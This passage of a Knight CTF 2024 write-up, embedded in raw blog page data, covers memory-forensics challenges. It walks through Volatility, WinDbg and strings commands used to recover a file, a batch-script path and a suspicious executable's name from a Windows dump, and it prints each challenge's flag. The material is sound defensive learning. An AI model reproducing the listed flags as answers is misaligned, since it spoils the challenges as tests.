12.083333333333332%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeElEQVQI1z3M0QrCIBhA4V0ubZBTRpPCWW36t5AYvf+rnYZEF9/d4TTxGcmfzK1Ejk5zCXeSFEQy67pWkoXHPBOs4zqOnIzh0LYopSqt9V8jSdjeGzlllFZMU+D1G5VSqmVZKglh7xIxRsZ97L3nPAy4rsNai+l7vvegNdpRirc9AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/464c04d3c0afca1ca1de6aaedaacf282/8ac56/image-20240123221213052.webp 240w,\n/static/464c04d3c0afca1ca1de6aaedaacf282/d3be9/image-20240123221213052.webp 480w,\n/static/464c04d3c0afca1ca1de6aaedaacf282/af945/image-20240123221213052.webp 705w\"\n              sizes=\"(max-width: 705px) 100vw, 705px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/464c04d3c0afca1ca1de6aaedaacf282/8ff5a/image-20240123221213052.png 240w,\n/static/464c04d3c0afca1ca1de6aaedaacf282/e85cb/image-20240123221213052.png 480w,\n/static/464c04d3c0afca1ca1de6aaedaacf282/d2cbc/image-20240123221213052.png 705w\"\n            sizes=\"(max-width: 705px) 100vw, 705px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/464c04d3c0afca1ca1de6aaedaacf282/d2cbc/image-20240123221213052.png\"\n            alt=\"image-20240123221213052\"\n            title=\"image-20240123221213052\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>As a long shot, I tried running <code class=\"language-text\">windows.dumpfiles.DumpFiles</code> against these files, but unfortunately I could not recover them.</p>\n<p>Text files and the like are often not cached, so it can’t be helped.</p>\n<p>Next, I tried <code class=\"language-text\">windows.cmdline.CmdLine</code>.</p>\n<p>This shows that there is one Notepad process.</p>\n<p><span\n     
 class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 814px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/601ffe85438278c21790791372882877/a4262/image-20240123221709967.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 13.750000000000002%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAn0lEQVQI1z2OOwqFMBREXYKFiI2CiaApjCaKK7AUBI2NH3D/m5jHHfAVw70znOJEWZahaRq0bYuqqhDHMYwxGIYBXdfBWsv0fc8Iq5QiK7eua/5JkiBNU0TLsiCEgOu6sG0b5nnG8zw4z5O57/t/3/cldxwH+7dJ3/cd67oiyvOcBtM00aAoCozjyDjnuIn9Zynmwnrv2WXXWtO2LEv8AHYuY4tP3yzEAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/601ffe85438278c21790791372882877/8ac56/image-20240123221709967.webp 240w,\n/static/601ffe85438278c21790791372882877/d3be9/image-20240123221709967.webp 480w,\n/static/601ffe85438278c21790791372882877/f23e7/image-20240123221709967.webp 814w\"\n              sizes=\"(max-width: 814px) 100vw, 814px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/601ffe85438278c21790791372882877/8ff5a/image-20240123221709967.png 240w,\n/static/601ffe85438278c21790791372882877/e85cb/image-20240123221709967.png 480w,\n/static/601ffe85438278c21790791372882877/a4262/image-20240123221709967.png 814w\"\n            sizes=\"(max-width: 814px) 100vw, 814px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/601ffe85438278c21790791372882877/a4262/image-20240123221709967.png\"\n            alt=\"image-20240123221709967\"\n            title=\"image-20240123221709967\"\n     
       loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>To read the contents of process memory, I used WinDbg.</p>\n<p>First, I identified the address of the process object for <code class=\"language-text\">notepad.exe</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 574px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c0aeb237db3e2d1c28c5863443849586/86389/image-20240123221839130.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQY002PS2+DMBCE+f8/qrnkUpzQKIHEJN4WsLACpSi8H5fpYiIlh08ej3Zndx1SCup2w5WRUoJIwfd91iGy7I62bdE0DbquY1a9eAt1XT+pUFUrTpqm2O0EXNeFKwS8/R6frAVD9I0wlDifCdttjI+NhhB3/vvwvC8oXuZw+MVP9IfqUaIsSzjLJHm5IAgCKCKcTke7qdbakiQaxhgOJ0RRBJMaxHHMfsIXZMjzHEVR2DAbOI7j85wXfd9jYH+aJstSM88zs+p3fxgGi+3h9x+z4ifUxn0bqwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c0aeb237db3e2d1c28c5863443849586/8ac56/image-20240123221839130.webp 240w,\n/static/c0aeb237db3e2d1c28c5863443849586/d3be9/image-20240123221839130.webp 480w,\n/static/c0aeb237db3e2d1c28c5863443849586/4e18f/image-20240123221839130.webp 574w\"\n              sizes=\"(max-width: 574px) 100vw, 574px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c0aeb237db3e2d1c28c5863443849586/8ff5a/image-20240123221839130.png 
240w,\n/static/c0aeb237db3e2d1c28c5863443849586/e85cb/image-20240123221839130.png 480w,\n/static/c0aeb237db3e2d1c28c5863443849586/86389/image-20240123221839130.png 574w\"\n            sizes=\"(max-width: 574px) 100vw, 574px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c0aeb237db3e2d1c28c5863443849586/86389/image-20240123221839130.png\"\n            alt=\"image-20240123221839130\"\n            title=\"image-20240123221839130\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I tried switching context to this process and investigating it, but it seemed to be paged out, so I couldn’t examine it.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 756px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/32ba1e945a4fdf2e5b3800dd9446261a/8ae3e/image-20240123222037307.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 9.583333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAbUlEQVQI1zWNSw6AIBQDvf/tCAgIKJ8QWGjC5wJVX8JikmkX7WaMgVIK1lo452COA4wxcM5xXhfu58GcE2MM4veVl7fW0HsnNq01hBCQUmLfJWKMKKXQgQ/hO7GUf2qtCF/nvSdPKSHnTONr8AVMFJLn+EZJOAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/32ba1e945a4fdf2e5b3800dd9446261a/8ac56/image-20240123222037307.webp 240w,\n/static/32ba1e945a4fdf2e5b3800dd9446261a/d3be9/image-20240123222037307.webp 
480w,\n/static/32ba1e945a4fdf2e5b3800dd9446261a/b5834/image-20240123222037307.webp 756w\"\n              sizes=\"(max-width: 756px) 100vw, 756px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/32ba1e945a4fdf2e5b3800dd9446261a/8ff5a/image-20240123222037307.png 240w,\n/static/32ba1e945a4fdf2e5b3800dd9446261a/e85cb/image-20240123222037307.png 480w,\n/static/32ba1e945a4fdf2e5b3800dd9446261a/8ae3e/image-20240123222037307.png 756w\"\n            sizes=\"(max-width: 756px) 100vw, 756px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/32ba1e945a4fdf2e5b3800dd9446261a/8ae3e/image-20240123222037307.png\"\n            alt=\"image-20240123222037307\"\n            title=\"image-20240123222037307\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Out of desperation, I ran <code class=\"language-text\">strings</code>, which let me obtain the flag for the next challenge, Execution, but not the flag for this one.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 661px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/78fb4fa078d4bc40861181f3f6c64f96/0012b/image-20240123223020408.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 25%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA6klEQVQY032QuXKEMBBECbkSENoFA0Vxq4RAEvbixBt4//+f2ox8BK6yg66ZZN50t8dFhvLlCZeNg6sUeVmhawzmeYZSCsMwoK5rCCGwbRustW62bYuyLNE0DbquA2MMYRjCk0LCaouxHzGee5cy7NcrpJQOSlrX1QHT9HyY58iyDEEQIIoip+89jmN4+77j/fHArjVuw4jnacbronAcB7QxzhGJoJxz+L7vnNDxbxHUo1hv9zvMsuDGLjg2jeWEG/MZm5xSvKqqUBTFj5M/gdTRQl2dR4JxiL7H9BWVupmmycEoZpIk/wJJH+rOhg6viQWtAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/78fb4fa078d4bc40861181f3f6c64f96/8ac56/image-20240123223020408.webp 240w,\n/static/78fb4fa078d4bc40861181f3f6c64f96/d3be9/image-20240123223020408.webp 480w,\n/static/78fb4fa078d4bc40861181f3f6c64f96/84ccf/image-20240123223020408.webp 661w\"\n              sizes=\"(max-width: 661px) 100vw, 661px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/78fb4fa078d4bc40861181f3f6c64f96/8ff5a/image-20240123223020408.png 240w,\n/static/78fb4fa078d4bc40861181f3f6c64f96/e85cb/image-20240123223020408.png 480w,\n/static/78fb4fa078d4bc40861181f3f6c64f96/0012b/image-20240123223020408.png 661w\"\n            sizes=\"(max-width: 661px) 100vw, 661px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/78fb4fa078d4bc40861181f3f6c64f96/0012b/image-20240123223020408.png\"\n            alt=\"image-20240123223020408\"\n            title=\"image-20240123223020408\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After looking into it more, I found that files that cannot be recovered with <code class=\"language-text\">windows.dumpfiles.DumpFiles</code> can sometimes be recovered using the <code class=\"language-text\">dumpfiles</code> plugin in 
Volatility 2. (I don’t fully understand the difference. Maybe it doesn’t retrieve them through the cache manager?)</p>\n<p>So I output the text file with <code class=\"language-text\">volatility_2.6_win64_standalone.exe -f KnightSquad.DMP --profile=Win7SP1x64_23418 dumpfiles -Q 0xb9ba7bb0 --name file -D outdir</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/8c6f7e1180ce58ed888c1ed72200ef8d/da20e/image-20240123224319656.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 4.583333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAQUlEQVQI1x3GSQ6AQAgFUe/QDBsCMS3iwvtf7yssKq+Osy7U86LqRmb+FvbecHdExHzbmRmYGao6diICIsJaa/wARWsauF3gWSkAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/8c6f7e1180ce58ed888c1ed72200ef8d/8ac56/image-20240123224319656.webp 240w,\n/static/8c6f7e1180ce58ed888c1ed72200ef8d/d3be9/image-20240123224319656.webp 480w,\n/static/8c6f7e1180ce58ed888c1ed72200ef8d/e46b2/image-20240123224319656.webp 960w,\n/static/8c6f7e1180ce58ed888c1ed72200ef8d/0cc45/image-20240123224319656.webp 1397w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/8c6f7e1180ce58ed888c1ed72200ef8d/8ff5a/image-20240123224319656.png 240w,\n/static/8c6f7e1180ce58ed888c1ed72200ef8d/e85cb/image-20240123224319656.png 480w,\n/static/8c6f7e1180ce58ed888c1ed72200ef8d/d9199/image-20240123224319656.png 
960w,\n/static/8c6f7e1180ce58ed888c1ed72200ef8d/da20e/image-20240123224319656.png 1397w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/8c6f7e1180ce58ed888c1ed72200ef8d/d9199/image-20240123224319656.png\"\n            alt=\"image-20240123224319656\"\n            title=\"image-20240123224319656\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The text file contained a Base64-encoded flag, allowing me to determine that the correct flag was <code class=\"language-text\">KCTF{Respect_Y0ur_Her4nki}</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token assign-left variable\">S0NURntSZXNwZWN0X1kwdXJfSGVyNG5raX0</span><span class=\"token operator\">=</span> RISC OS\nRISCOS\nFire OS\nFireOS\nmacOS\nmac OS\nMac OS X</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 762px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a7b15f6ec161df1e909876cf0dda6ce3/a016c/image-20240123224540625.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 8.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeElEQVQI11WJUQuCMBgAfW0fy6T8tgkz15hpZGT9/992kQ9BD8fBXeWfDp2PhOHCOa9M00Q/9ozvkbQMlDUzP+5cb6/tpZQopZBzxntPjHFrqoq1lqoLHe2pxTuHc0rwAasWE3ZIEEQNUtfsm45D02CM+UNEfv7yAeI1M14tEcItAAAAAElFTkSuQmCC'); background-size: cover; display: 
block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/a7b15f6ec161df1e909876cf0dda6ce3/8ac56/image-20240123224540625.webp 240w,\n/static/a7b15f6ec161df1e909876cf0dda6ce3/d3be9/image-20240123224540625.webp 480w,\n/static/a7b15f6ec161df1e909876cf0dda6ce3/093df/image-20240123224540625.webp 762w\"\n              sizes=\"(max-width: 762px) 100vw, 762px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/a7b15f6ec161df1e909876cf0dda6ce3/8ff5a/image-20240123224540625.png 240w,\n/static/a7b15f6ec161df1e909876cf0dda6ce3/e85cb/image-20240123224540625.png 480w,\n/static/a7b15f6ec161df1e909876cf0dda6ce3/a016c/image-20240123224540625.png 762w\"\n            sizes=\"(max-width: 762px) 100vw, 762px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/a7b15f6ec161df1e909876cf0dda6ce3/a016c/image-20240123224540625.png\"\n            alt=\"image-20240123224540625\"\n            title=\"image-20240123224540625\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"executionforensic\" style=\"position:relative;\"><a href=\"#executionforensic\" aria-label=\"executionforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Execution(Forensic)</h3>\n<blockquote>\n<p>My leader, Noman Prodhan, 
executed something in the cmd of this infected machine. Could you please figure out what he actually executed?</p>\n</blockquote>\n<p>From the results of running <code class=\"language-text\">strings</code> on the dump file, I found that <code class=\"language-text\">KCTF{W3_AR3_tH3_Kn1GHt}</code> was the flag.</p>\n<h3 id=\"path-of-the-executableforensic\" style=\"position:relative;\"><a href=\"#path-of-the-executableforensic\" aria-label=\"path of the executableforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Path of the Executable(Forensic)</h3>\n<blockquote>\n<p>What is the path folder of the executable file which execute privious flag?</p>\n</blockquote>\n<p>Looking at the results of <code class=\"language-text\">strings -a -t d -el KnightSquad.DMP | grep KCTF{</code>, I found that <code class=\"language-text\">C:\\Users\\siam>C:\\Users\\siam\\Documents\\windows.bat</code> outputs the previous flag.</p>\n<p>Therefore, <code class=\"language-text\">KCTF{C:\\Users\\siam\\Documents}</code> is the correct flag.</p>\n<h3 id=\"maliciousforensic\" style=\"position:relative;\"><a href=\"#maliciousforensic\" aria-label=\"maliciousforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 
9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Malicious(Forensic)</h3>\n<blockquote>\n<p>What is the malicious software name?</p>\n</blockquote>\n<p>I had already identified a suspicious file in the output of <code class=\"language-text\">windows.filescan.FileScan</code>, so I found that <code class=\"language-text\">KCTF{MadMan.exe}</code> was the correct flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 500px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/81ebcd671d7f9a751539b7507ff469b5/0b533/image-20240123225135938.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 23.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABJklEQVQY0z2QSWvCUBSFQ2nFYdFK2iia0hqTGBMzIXbjzpWlIC4SYqUqiOIA/v/l13ezcHF499zpnXu0MAxJ0xTf96nVamiahmmaBEGA1CzLwvM8XNct0et06LTb2I5NkiT0+n0+9Vc+mjqu6tNutxuC6/XKcrlkPp+z3W45n89cLhf2+z2n04nj8cjhcGCf5fyqvq/JhFarVYp4MwwMhXq9jrbb7dhsNqzXa2azGdPplMViwWq1Issy8jwva0VRlMsLFf99/xD2LB6eHqlWq9i2zUCpq1QqaCJ7PB4zGo1oNBr3k6MoukPOF0sEw+EQT2xwnJK7alkSxQQqL1yL47j0UIZ0XS9li2+ySPLin3gpH8or3FexIHVc/O47g66J/Wbw3HzhH82jnhXyNOfZAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/81ebcd671d7f9a751539b7507ff469b5/8ac56/image-20240123225135938.webp 240w,\n/static/81ebcd671d7f9a751539b7507ff469b5/d3be9/image-20240123225135938.webp 480w,\n/static/81ebcd671d7f9a751539b7507ff469b5/b0a15/image-20240123225135938.webp 500w\"\n              sizes=\"(max-width: 500px) 100vw, 
500px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/81ebcd671d7f9a751539b7507ff469b5/8ff5a/image-20240123225135938.png 240w,\n/static/81ebcd671d7f9a751539b7507ff469b5/e85cb/image-20240123225135938.png 480w,\n/static/81ebcd671d7f9a751539b7507ff469b5/0b533/image-20240123225135938.png 500w\"\n            sizes=\"(max-width: 500px) 100vw, 500px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/81ebcd671d7f9a751539b7507ff469b5/0b533/image-20240123225135938.png\"\n            alt=\"image-20240123225135938\"\n            title=\"image-20240123225135938\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>There were so many challenges that I got tired just writing this writeup.</p>\n<p>Forensics really is fun.</p>","fields":{"slug":"/ctf-knight-ctf-2024-en","tagSlugs":["/tag/rev-en/","/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2024-01-23","description":"Knight CTF 2024 Writeup","tags":["Rev (en)","Forensic (en)","English"],"title":"Knight CTF 2024 
Writeup","socialImage":{"publicURL":"/static/e353d4b1696f0dba9be231a7cddd182f/ctf-knight-ctf-2024.png"}}}},"pageContext":{"slug":"/ctf-knight-ctf-2024-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}